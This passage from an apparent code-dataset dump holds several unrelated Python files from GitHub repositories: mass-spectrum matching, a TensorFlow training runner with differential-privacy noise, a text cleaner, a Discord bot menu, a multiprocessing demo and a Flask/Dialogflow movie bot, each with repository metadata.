Use argsort to restore original indices later\n        self_arg_sorted = np.argsort(self.extracted_mz)\n        sorted_self_mz = self.extracted_mz[self_arg_sorted]\n        other_arg_sorted = np.argsort(spectrum_to_match.extracted_mz)\n        sorted_other_mz = spectrum_to_match.extracted_mz[other_arg_sorted]\n\n        self_start_idx = 0\n        self_idx = []\n        other_idx = []\n        for other_mz_idx, other_mz in enumerate(sorted_other_mz):\n            smallest_difference = np.inf\n            for self_mz_idx, self_mz in zip(\n                range(self_start_idx, len(sorted_self_mz)),\n                sorted_self_mz[self_start_idx:],\n            ):\n                # Since they're sorted, we can skip the ones we've already checked\n                # Check whether we're within tolerance\n                # ppm converted to a relative tolerance: (ref_val - val) * 1e6 / ref_val\n                if np.isclose(self_mz, other_mz, rtol=match_tolerance_ppm * 1e-6):\n                    # Mz values are sorted; once the difference increases we've found the minimum\n                    if abs(self_mz - other_mz) < smallest_difference:\n                        smallest_difference = abs(self_mz - other_mz)\n                        closest_self_idx = self_mz_idx\n                        closest_other_idx = other_mz_idx\n                        continue\n                    self_idx.append(closest_self_idx)\n                    other_idx.append(closest_other_idx)\n                    self_start_idx = (\n                        self_mz_idx - 1\n                    )  # Previous one might also be closest to the next bin\n                    break\n                # Check whether other_mz is larger; indicates we should increment self_mz\n                elif self_mz > other_mz:\n                    # Get next self_mz; ignore previously-checked mz from input spectra in next round\n                    self_start_idx = self_mz_idx\n                    break\n        # Need to remap sorted idx to original idx:\n        return self_arg_sorted[self_idx], other_arg_sorted[other_idx]\n\n    def extracted_cosine_similarity(self, spectrum_to_compare: \"Spectrum\") -> float:\n        \"\"\"\n        Computes the cosine similarity between the extracted fragments of this spectrum and the input.\n\n        Parameters\n        ----------\n        spectrum_to_compare : Spectrum\n            Spectrum against which to compare\n        Returns\n        -------\n        float\n            Cosine similarity between this spectrum and the input.\n        \"\"\"\n\n        # Get fragment idx\n        self_fragment_idx, other_fragment_idx = self.get_matching_mz_indices(\n            spectrum_to_match=spectrum_to_compare, match_tolerance_ppm=30\n        )\n        # if len(self_fragment_idx) == 0:\n        #     return cosine_similarity(np.ones((1,1)), np.zeros((1,1)))\n        return cosine_similarity(\n            np.expand_dims(self.extracted_intensity[self_fragment_idx], axis=0),\n            np.expand_dims(\n                spectrum_to_compare.extracted_intensity[other_fragment_idx], axis=0\n            ),\n        )\n", "repo_name": "xomicsdatascience/zoDIAq", "sub_path": "src/zodiaq/plotting/spectrum.py", "file_name": "spectrum.py", "file_ext": "py", "file_size_in_byte": 6217, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.array", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.isclose", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.metrics.pairwise.cosine_similarity", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 146, "usage_type": "call"}]}
+{"seq_id": "71923649689", "text": "from typing import Any, Mapping, Optional, List, Tuple\nfrom absl import logging\n\nimport os\nimport gin\nimport functools\nimport tensorflow as tf\n\nfrom orbit.core import performance\nfrom orbit.config import ExperimentConfig\nfrom orbit.config import RuntimeConfig\nfrom orbit.config import OptimizationConfig\nfrom orbit.config import DifferentialPrivacyConfig\nfrom orbit.core.checkpoint import BestCheckpointExporter\nfrom orbit.launch import action\nfrom orbit.launch.task import Task\nfrom orbit.launch.controller import Controller, Action\nfrom orbit.launch.trainer import AbstractTrainer, AbstractValidator, Trainer\nfrom orbit.optimization import ExponentialMovingAverage\nfrom orbit.optimization.factory import OptimizerFactory\n\n\ndef _clip_l2_norm(grads_vars: List[Tuple[tf.Tensor, tf.Tensor]],\n l2_norm_clip: float) -> List[Tuple[tf.Tensor, tf.Tensor]]:\n gradients = []\n variables = []\n for g, v in grads_vars:\n gradients.append(g)\n variables.append(v)\n clipped_gradients = tf.clip_by_global_norm(gradients, l2_norm_clip)[0]\n return list(zip(clipped_gradients, variables))\n\n\ndef _add_noise(grads_vars: List[Tuple[tf.Tensor, tf.Tensor]],\n noise_stddev: float) -> List[Tuple[tf.Tensor, tf.Tensor]]:\n ret = []\n for g, v in grads_vars:\n noise = tf.random.normal(tf.shape(g), stddev=noise_stddev)\n ret.append(g + noise, v)\n return ret\n\n\nclass OrbitExperimentRunner:\n def __init__(self,\n distribution_strategy: tf.distribute.Strategy,\n task: Task,\n mode: str,\n params: ExperimentConfig,\n model_dir: str,\n run_post_validation: bool = False,\n save_summary: bool = True,\n train_actions: Optional[List[Action]] = None,\n validation_actions: Optional[List[Action]] = None,\n controller_cls=Controller) -> None:\n self._strategy = distribution_strategy or tf.distribute.get_strategy()\n self._params = params\n self._mode = mode\n self._model_dir = model_dir\n self._run_post_validation = run_post_validation\n\n with self._strategy.scope():\n self._trainer = self._build_trainer(\n params, task,\n train=('train' in mode),\n validation=('validation' in mode) or run_post_validation)\n assert self._trainer is not None\n\n self._checkpoint_manager = self._maybe_build_checkpoint_manager()\n\n self._controller = self._build_controller(\n trainer=self._trainer if 'train' in mode else None,\n validator=self._trainer,\n save_summary=save_summary,\n train_actions=train_actions,\n validation_actions=validation_actions,\n controller_cls=controller_cls)\n\n def _build_controller(self,\n trainer: AbstractTrainer,\n validator: AbstractValidator,\n save_summary: bool = True,\n train_actions: Optional[List[Action]] = None,\n validation_actions: Optional[List[Action]] = None,\n controller_cls=Controller):\n train_actions = [] if not train_actions else train_actions\n if trainer:\n train_actions += self._get_train_actions(\n self._params, trainer, self._model_dir,\n checkpoint_manager=self._checkpoint_manager)\n validation_actions = [] if not validation_actions else validation_actions\n if validator:\n validation_actions += self._get_validation_actions(\n self._params, trainer, self._model_dir)\n\n summary_dir = os.path.join(self._model_dir, 'train')\n validation_summary_dir = os.path.join(\n self._model_dir, self._params.trainer.validation_summary_subdir)\n summary_interval = self._params.trainer.summary_interval\n\n controller = controller_cls(\n strategy=self._strategy,\n trainer=trainer,\n validator=validator,\n global_step=self._trainer.global_step,\n 
steps_per_loop=self._params.trainer.steps_per_loop,\n checkpoint_manager=self._checkpoint_manager,\n summary_dir=summary_dir if save_summary else None,\n validation_summary_dir=validation_summary_dir if save_summary else None,\n summary_interval=summary_interval if save_summary else None,\n train_actions=train_actions,\n validation_actions=validation_actions)\n return controller\n\n def _build_trainer(self,\n params: ExperimentConfig,\n task: Task,\n train: bool,\n validation: bool):\n logging.info('Running default trainer.')\n\n # Build the model and optimizer\n model = task.build_model()\n optimizer = self._create_optimizer(task, params)\n\n return Trainer(\n self._strategy,\n params, task,\n model=model,\n optimizer=optimizer,\n train=train,\n validation=validation,\n checkpoint_exporter=self._build_best_checkpoint_exporter())\n\n def _create_optimizer(self, task, params):\n gradient_transformers = None\n if hasattr(params.task, 'differential_privacy_config'):\n dp_config = params.task.differential_privacy_config\n logging.info('Adding differential privacy transform with config %s.',\n dp_config.as_dict())\n noise_stddev = dp_config.clipping_norm * dp_config.noise_multiplier\n gradient_transformers = [\n functools.partial(\n _clip_l2_norm, l2_norm_clip=dp_config.clipping_norm),\n functools.partial(\n _add_noise, noise_stddev=noise_stddev, noise_seed=dp_config.noise_seed)\n ]\n\n opt_factory = OptimizerFactory(params.trainer.optimizer_config)\n optimizer = opt_factory.create_optimizer(\n opt_factory.learning_rate(),\n gradient_transformers=gradient_transformers,\n use_legacy_optimizer=params.trainer.use_legacy_optimizer)\n # Configuring optimizer when loss_scale is set in runtime config. This helps\n # avoiding overflow/underflow for float16 computations.\n if params.runtime:\n optimizer = performance.configure_optimizer(\n optimizer,\n use_float16=params.runtime.mixed_precision_dtype == 'float16',\n loss_scale=params.runtime.loss_scale)\n return optimizer\n\n def _build_best_checkpoint_exporter(self):\n export_subdir = self._params.trainer.best_checkpoint_export_subdir\n metric_name = self._params.trainer.best_checkpoint_validation_metric\n metric_comp = self._params.trainer.best_checkpoint_metric_comp\n if self._model_dir and metric_name:\n if export_subdir:\n best_ckpt_dir = os.path.join(self._model_dir, export_subdir)\n else:\n best_ckpt_dir = self._model_dir\n best_ckpt_exporter = BestCheckpointExporter(\n best_ckpt_dir, metric_name, metric_comp)\n logging.info('Created the best checkpoint exporter. 
'\n 'model_dir: %s, export_subdir: %s, metric_name: %s',\n self._model_dir, export_subdir, metric_name)\n else:\n best_ckpt_exporter = None\n return best_ckpt_exporter\n\n def _maybe_build_checkpoint_manager(self):\n assert self._trainer is not None\n if self._trainer.checkpoint:\n if self._model_dir is None:\n raise ValueError('model_dir must be specified, but got None.')\n checkpoint_manager = tf.train.CheckpointManager(\n self._trainer.checkpoint,\n directory=self._model_dir,\n max_to_keep=self._params.trainer.max_to_keep,\n step_counter=self._trainer.global_step,\n checkpoint_interval=self._params.trainer.checkpoint_interval,\n init_fn=self._trainer.initialize)\n else:\n checkpoint_manager = None\n return checkpoint_manager\n\n @gin.configurable\n def _get_train_actions(self, params: ExperimentConfig,\n trainer: Trainer,\n model_dir: str,\n checkpoint_manager: tf.train.CheckpointManager):\n train_actions = []\n if hasattr(params.task, 'pruning') and params.task.pruning:\n train_actions.append(action.PruningAction(\n exprt_dir=model_dir,\n model=trainer.model,\n optimizer=trainer.optimizer))\n\n if params.trainer.recovery_max_trials >= 0:\n recovery_condition = action.RecoveryActionCondition(\n global_step=trainer.global_step,\n loss_upper_bound=params.trainer.loss_upper_bound,\n recovery_begin_steps=params.trainer.recovery_begin_steps,\n recovery_max_trials=params.trainer.recovery_max_trials)\n recovery_action = action.ConditionAction(\n condition=recovery_condition,\n action=action.RecoveryAction(checkpoint_manager))\n train_actions.append(recovery_action)\n return train_actions\n\n @gin.configurable\n def _get_validation_actions(self, params: ExperimentConfig, trainer: Trainer, model_dir: str):\n validation_actions = []\n if trainer is not None and isinstance(trainer.optimizer, ExponentialMovingAverage):\n validation_actions.append(action.EMACheckpointAction(\n export_dir=model_dir,\n optimizer=trainer.optimizer,\n checkpoint=trainer.checkpoint,\n max_to_keep=params.trainer.max_to_keep))\n return validation_actions\n\n def run(self):\n self._controller.boost(\n self._mode, self._params.trainer, self._run_post_validation)\n", "repo_name": "exogeny/rocket", "sub_path": "orbit/launch/runner.py", "file_name": "runner.py", "file_ext": "py", "file_size_in_byte": 9282, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "typing.List", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 23, "usage_type": "name"}, {"api_name": "tensorflow.Tensor", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.clip_by_global_norm", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 24, "usage_type": "name"}, {"api_name": "tensorflow.Tensor", "line_number": 24, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 34, "usage_type": "name"}, {"api_name": "tensorflow.Tensor", "line_number": 34, "usage_type": "attribute"}, {"api_name": "tensorflow.random.normal", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.shape", "line_number": 38, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 35, "usage_type": 
"name"}, {"api_name": "tensorflow.Tensor", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.distribute", "line_number": 45, "usage_type": "attribute"}, {"api_name": "orbit.launch.task.Task", "line_number": 46, "usage_type": "name"}, {"api_name": "orbit.config.ExperimentConfig", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 52, "usage_type": "name"}, {"api_name": "orbit.launch.controller.Action", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 53, "usage_type": "name"}, {"api_name": "orbit.launch.controller.Action", "line_number": 53, "usage_type": "name"}, {"api_name": "orbit.launch.controller.Controller", "line_number": 54, "usage_type": "name"}, {"api_name": "tensorflow.distribute.get_strategy", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.distribute", "line_number": 55, "usage_type": "attribute"}, {"api_name": "orbit.launch.trainer.AbstractTrainer", "line_number": 79, "usage_type": "name"}, {"api_name": "orbit.launch.trainer.AbstractValidator", "line_number": 80, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 82, "usage_type": "name"}, {"api_name": "orbit.launch.controller.Action", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 83, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 83, "usage_type": "name"}, {"api_name": "orbit.launch.controller.Action", "line_number": 83, "usage_type": "name"}, {"api_name": "orbit.launch.controller.Controller", "line_number": 84, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "orbit.config.ExperimentConfig", "line_number": 115, "usage_type": "name"}, {"api_name": "orbit.launch.task.Task", "line_number": 116, "usage_type": "name"}, {"api_name": "absl.logging.info", "line_number": 119, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 119, "usage_type": "name"}, {"api_name": "orbit.launch.trainer.Trainer", "line_number": 125, "usage_type": "call"}, {"api_name": "absl.logging.info", "line_number": 138, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 138, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 142, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 144, "usage_type": "call"}, {"api_name": "orbit.optimization.factory.OptimizerFactory", "line_number": 148, "usage_type": "call"}, {"api_name": "orbit.core.performance.configure_optimizer", "line_number": 156, "usage_type": "call"}, {"api_name": "orbit.core.performance", "line_number": 156, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "orbit.core.checkpoint.BestCheckpointExporter", "line_number": 171, "usage_type": "call"}, {"api_name": "absl.logging.info", "line_number": 173, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 173, "usage_type": "name"}, {"api_name": 
"tensorflow.train.CheckpointManager", "line_number": 185, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 185, "usage_type": "attribute"}, {"api_name": "orbit.config.ExperimentConfig", "line_number": 197, "usage_type": "name"}, {"api_name": "orbit.launch.trainer.Trainer", "line_number": 198, "usage_type": "name"}, {"api_name": "tensorflow.train", "line_number": 200, "usage_type": "attribute"}, {"api_name": "orbit.launch.action.PruningAction", "line_number": 203, "usage_type": "call"}, {"api_name": "orbit.launch.action", "line_number": 203, "usage_type": "name"}, {"api_name": "orbit.launch.action.RecoveryActionCondition", "line_number": 209, "usage_type": "call"}, {"api_name": "orbit.launch.action", "line_number": 209, "usage_type": "name"}, {"api_name": "orbit.launch.action.ConditionAction", "line_number": 214, "usage_type": "call"}, {"api_name": "orbit.launch.action", "line_number": 214, "usage_type": "name"}, {"api_name": "orbit.launch.action.RecoveryAction", "line_number": 216, "usage_type": "call"}, {"api_name": "orbit.launch.action", "line_number": 216, "usage_type": "name"}, {"api_name": "gin.configurable", "line_number": 196, "usage_type": "attribute"}, {"api_name": "orbit.config.ExperimentConfig", "line_number": 221, "usage_type": "name"}, {"api_name": "orbit.launch.trainer.Trainer", "line_number": 221, "usage_type": "name"}, {"api_name": "orbit.optimization.ExponentialMovingAverage", "line_number": 223, "usage_type": "argument"}, {"api_name": "orbit.launch.action.EMACheckpointAction", "line_number": 224, "usage_type": "call"}, {"api_name": "orbit.launch.action", "line_number": 224, "usage_type": "name"}, {"api_name": "gin.configurable", "line_number": 220, "usage_type": "attribute"}]}
+{"seq_id": "8070646373", "text": "\nimport io\nimport re\nimport datetime\nclass TextCleaner:\n\n text = \"\"\n f_name = \"txt\"+datetime.datetime.now().strftime(\"%d-%m %H %M\")\n links_list =[]\n special_chars = []\n dates_list = []\n\n #TODO adding one list of removed chars, add deleted matches position(low priority)\n def read_file(self):\n try:\n f = io.open(self.f_name, \"r\", encoding=\"utf-8\")\n self.text = f.read()\n except FileNotFoundError:\n print(\"File Not Found\")\n else:\n f.close()\n\n def write_file(self):\n with io.open(self.f_name, \"w\", encoding=\"utf-8\") as f:\n f.write(self.text)\n f.close()\n\n # Clears binded wrods\n def clear_binded_words(self):\n\n # Function for detecting binded words 'XXYy' splitting them\n\n def clean_XXYy():\n re_pattern_split = '(([A-Z]+([a-z])))'\n re_matches_split = re.findall(re_pattern_split, self.text)\n for match in re_matches_split:\n if match[0].__len__() > 2:\n fixed_match = match[0][:-2] + \" \" + match[0][-2:]\n self.text = self.text.replace(match[0], fixed_match)\n\n # pattern for detecting binded words 'xxYy' splitting them\n\n def clean_xxYy():\n re_pattern_split = '(([a-z])+([A-Z]))'\n re_matches_split = re.findall(re_pattern_split, self.text)\n for match in re_matches_split:\n fixed_match = match[0][:-1] + \" \" + match[0][-1]\n self.text = self.text.replace(match[0], fixed_match)\n\n clean_XXYy()\n clean_xxYy()\n\n # Clears links\n def clear_links(self):\n # pattern for main site names\n re_pattern = '(http|ftp|https)\\:\\/\\/([\\w_-]+(?:(?:\\.[\\w_-]+)+))([\\w.,@?^=%&:/~+#-]*[\\w@?^=%&/~+#-])?'\n re_match = re.findall(re_pattern, self.text)\n for match in re_match:\n match_str = ''.join(match[0]) + '://'\n match_str += ''.join(match[1])\n match_str += ''.join(match[2])\n self.text = self.text.replace(match_str, \" \")\n self.links_list.append(match_str)\n\n # Clears special chars\n\n def find_special_chars(self):\n\n # Finding special characters\n\n for char in self.text:\n if not char.isalnum() and not char.isspace():\n if not char in self.special_chars:\n self.special_chars.append(char)\n else:\n pass\n\n # Find dates using regex\n\n def clear_dates(self):\n\n re_pattern_date = '(([0-9]{2,4})(\\/|\\-|\\s)([0-9]{1,2})(\\/|\\-|\\s)([0-9]{1,4}))'\n re_match = re.findall(re_pattern_date, self.text)\n\n for match in re_match:\n self.dates_list.append(match[0])\n self.text = self.text.replace(match[0], \" \")\n\n # Clears special characters\n\n def clear_special_char(self):\n for char in self.text:\n if char in self.special_chars:\n self.text = self.text.replace(char, \" \")\n\n def clear_special_char_no_punctuation(self):\n for char in self.text:\n if char in self.special_chars and not (char=='.' 
or char==',' or char=='/'):\n self.text= self.text.replace(char,\" \")\n # Clears digitis\n\n def clear_digits(self):\n for char in self.text:\n if char.isdigit():\n self.text = self.text.replace(char, \" \")\n\n # Clears multispace\n\n def clear_multispace(self):\n self.text = ' '.join(self.text.split())\n\n # text words to list\n # return words_list\n\n def text_to_list(self):\n words= self.text.split()\n return words\n\n def lower_text(self):\n self.text = self.text.lower()\n\n def clear_text(self):\n self.clear_binded_words()\n self.clear_links()\n self.find_special_chars()\n self.clear_dates()\n self.clear_special_char()\n self.clear_digits()\n self.clear_multispace()\n self.lower_text()\n\n def clear_text_base(self):\n self.clear_binded_words()\n self.clear_links()\n self.find_special_chars()\n self.clear_dates()\n self.clear_digits()\n self.clear_multispace()\n\n\n def get_text(self):\n return self.text\n def get_trash(self):\n trash = [self.links_list,self.special_chars,self.dates_list]\n return trash\n def __init__(self, file_name=None,txt=None):\n\n if file_name is not None:\n self.f_name=file_name\n\n if txt is None:\n self.read_file()\n else:\n self.text =txt\n\ndef main():\n pass\n\nif __name__==\"__main__\":\n main()", "repo_name": "45tooclose/python-new", "sub_path": "classes/TextCleaner.py", "file_name": "TextCleaner.py", "file_ext": "py", "file_size_in_byte": 4632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "32", "api": [{"api_name": "datetime.datetime.now", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 8, "usage_type": "attribute"}, {"api_name": "io.open", "line_number": 16, "usage_type": "call"}, {"api_name": "io.open", "line_number": 24, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 35, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 45, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 57, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 83, "usage_type": "call"}]}
+{"seq_id": "43590283131", "text": "# -*- coding: utf-8 -*-\n\nimport time\nimport logging\nimport logging.config\nfrom concurrent_log_handler import ConcurrentRotatingFileHandler\n\nlogging.config.fileConfig('logging.conf')\n\nlogger = logging.getLogger(__file__)\n\ndef test():\n i = 1\n while True:\n print(f'{i}')\n logger.error(i)\n i += 1\n time.sleep(5)\n\nif __name__ == '__main__':\n test()", "repo_name": "Sunny-wong/python-supervisor-win", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 380, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.config.fileConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.config", "line_number": 8, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "26105848037", "text": "from __future__ import annotations\n\nfrom typing import List, Union, Iterable, Tuple\n\nimport discord\n\nfrom redbot.core.i18n import Translator\nfrom redbot.core.utils.chat_formatting import humanize_number, escape\nfrom redbot.core.utils._dpy_menus_utils import SimpleHybridMenu\nfrom redbot.vendored.discord.ext import menus\n\n_ = Translator(\"CustomCommands\", __file__)\n\n\nclass CCListSource(menus.ListPageSource):\n def __init__(self, custom_commands: Iterable[Tuple[str, dict]]):\n super().__init__(custom_commands, per_page=5)\n\n async def format_page(\n self, menu: SimpleHybridMenu, entries: Iterable[Tuple[str, dict]]\n ) -> Union[discord.Embed, str]:\n current_entry = menu.current_page + 1\n total_entries = self._max_pages\n\n results = []\n for command, body in entries:\n responses = body[\"response\"]\n\n if isinstance(responses, list):\n result = \", \".join(map(discord.utils.escape_markdown, responses))\n elif isinstance(responses, str):\n result = discord.utils.escape_markdown(responses)\n else:\n continue\n # Cut preview to 52 characters max\n if len(result) > 52:\n result = result[:49] + \"...\"\n # Replace newlines with spaces\n result = result.replace(\"\\n\", \" \")\n # Escape markdown and mass mentions\n result = escape(result, formatting=True, mass_mentions=True)\n results.append((f\"{menu.ctx.clean_prefix}{command}\", result))\n\n if await menu.ctx.embed_requested():\n # We need a space before the newline incase the CC preview ends in link (GH-2295)\n content = \" \\n\".join(map(\"**{0[0]}** : {0[1]}\".format, results))\n embed = discord.Embed(\n title=_(\"Custom Command List\"),\n description=content,\n colour=await menu.ctx.embed_colour(),\n )\n if total_entries > 1:\n text = _(\"Page: {page_num}/{total_pages}\\n\").format(\n page_num=humanize_number(current_entry),\n total_pages=humanize_number(max(1, total_entries)),\n )\n embed.set_footer(text=text)\n return embed\n else:\n return \"\\n\".join(map(\"{0[0]:<12} : {0[1]}\".format, results))\n\n\nclass CCRawSource(menus.ListPageSource):\n def __init__(self, custom_commands: List[str]):\n super().__init__(custom_commands, per_page=1)\n\n async def format_page(self, menu: SimpleHybridMenu, entry: str) -> Union[discord.Embed, str]:\n raw = discord.utils.escape_markdown(entry)\n current_entry = menu.current_page + 1\n total_entries = self._max_pages\n if await menu.ctx.embed_requested():\n colour = await menu.ctx.embed_colour()\n if len(raw) > 2048:\n raw = f\"{raw[:2045]}...\"\n embed = discord.Embed(\n title=_(\"Response #{num}\").format(num=current_entry),\n description=raw,\n colour=colour,\n )\n if total_entries > 1:\n text = _(\"Page: {page_num}/{total_pages}\\n\").format(\n page_num=humanize_number(current_entry),\n total_pages=humanize_number(max(1, total_entries)),\n )\n embed.set_footer(text=text)\n return embed\n else:\n msg = _(\"Response #{num}/{total}:\\n{raw}\").format(\n num=humanize_number(current_entry),\n total=humanize_number(max(1, total_entries)),\n raw=raw,\n )\n if len(msg) > 2000:\n msg = f\"{msg[:1997]}...\"\n return msg\n", "repo_name": "Scuffed-Guard/Draper-Red-Edge", "sub_path": "redbot/cogs/customcom/menus.py", "file_name": "menus.py", "file_ext": "py", "file_size_in_byte": 3749, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "32", "api": [{"api_name": "redbot.core.i18n.Translator", "line_number": 12, "usage_type": "call"}, {"api_name": "redbot.vendored.discord.ext.menus.ListPageSource", "line_number": 15, 
"usage_type": "attribute"}, {"api_name": "redbot.vendored.discord.ext.menus", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 16, "usage_type": "name"}, {"api_name": "redbot.core.utils._dpy_menus_utils.SimpleHybridMenu", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 20, "usage_type": "name"}, {"api_name": "discord.utils", "line_number": 30, "usage_type": "attribute"}, {"api_name": "discord.utils.escape_markdown", "line_number": 32, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 32, "usage_type": "attribute"}, {"api_name": "redbot.core.utils.chat_formatting.escape", "line_number": 41, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 47, "usage_type": "call"}, {"api_name": "redbot.core.utils.chat_formatting.humanize_number", "line_number": 54, "usage_type": "call"}, {"api_name": "redbot.core.utils.chat_formatting.humanize_number", "line_number": 55, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 21, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 21, "usage_type": "attribute"}, {"api_name": "redbot.vendored.discord.ext.menus.ListPageSource", "line_number": 63, "usage_type": "attribute"}, {"api_name": "redbot.vendored.discord.ext.menus", "line_number": 63, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 64, "usage_type": "name"}, {"api_name": "redbot.core.utils._dpy_menus_utils.SimpleHybridMenu", "line_number": 67, "usage_type": "name"}, {"api_name": "discord.utils.escape_markdown", "line_number": 68, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 68, "usage_type": "attribute"}, {"api_name": "discord.Embed", "line_number": 75, "usage_type": "call"}, {"api_name": "redbot.core.utils.chat_formatting.humanize_number", "line_number": 82, "usage_type": "call"}, {"api_name": "redbot.core.utils.chat_formatting.humanize_number", "line_number": 83, "usage_type": "call"}, {"api_name": "redbot.core.utils.chat_formatting.humanize_number", "line_number": 89, "usage_type": "call"}, {"api_name": "redbot.core.utils.chat_formatting.humanize_number", "line_number": 90, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 67, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 67, "usage_type": "attribute"}]}
+{"seq_id": "30721325992", "text": "# 进程间通信有两种方式,队列和管道,Queue用于多个进程间实现通信,Pipe是两个进程的通信\n# 进程间的队列\n# 每个进程在内存中都是独立的一块空间,不像线程那样可以共享数据,所以只能由父进程通过传参的方式把队列传给子进程\n\n\nimport multiprocessing\nfrom multiprocessing import Queue\n\n\ndef foo(q):\n q.put([12, 'hello', True])\n\n\nif __name__ == '__main__':\n q = Queue() # 创建进程队列\n\n # 创建一个子进程\n p = multiprocessing.Process(target=foo, args=(q,))\n # 通过传参的方式把这个队列对象传给父进程\n p.start()\n\n print(q.get())\n", "repo_name": "nwmsno1/Python-Base", "sub_path": "basic/Multiprocessing/multipro_queue.py", "file_name": "multipro_queue.py", "file_ext": "py", "file_size_in_byte": 660, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "multiprocessing.Queue", "line_number": 15, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "71560042009", "text": "import os\nimport dialogflow\nimport requests\nimport json\nimport pusher\n\nfrom flask import Flask, request, jsonify, render_template\nfrom dotenv import load_dotenv, find_dotenv\n\nload_dotenv(find_dotenv())\n\n# initialize Pusher\npusher_client = pusher.Pusher(\n\tapp_id=os.getenv('PUSHER_APP_ID'),\n\tkey=os.getenv('PUSHER_APP_KEY'),\n\tsecret=os.getenv('PUSHER_APP_SECRET'),\n\tcluster=os.getenv('PUSHER_APP_CLUSTER'),\n\tssl=True)\n\t\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n\treturn render_template('index.html')\n\n\n@app.route('/get-movie-detail', methods=['POST'])\ndef get_movie_detail():\n\tdata = request.get_json(silent=True)\n\tmovie = data['queryResult']['parameters']['movie']\n\tapi_key = os.getenv('OMDB_API_KEY')\n\n\tmovie_detail = requests.get('http://www.omdbapi.com/?t={0}&apikey={1}'.format(movie, api_key)).content\n\tmovie_detail = json.loads(movie_detail)\n\tresponse = \"\"\"\n\t\tTitle : {0}\n\t\tReleased: {1}\n\t\tActors: {2}\n\t\tPlot: {3}\n\t\"\"\".format(movie_detail['Title'], movie_detail['Released'], movie_detail['Actors'], movie_detail['Plot'])\n\n\treply = {\n\t\t'fulfillmentText': response\n\t}\n\n\treturn jsonify(reply)\n\n\ndef detect_intent_texts(project_id, session_id, text, language_code):\n\tsession_client = dialogflow.SessionsClient()\n\tsession 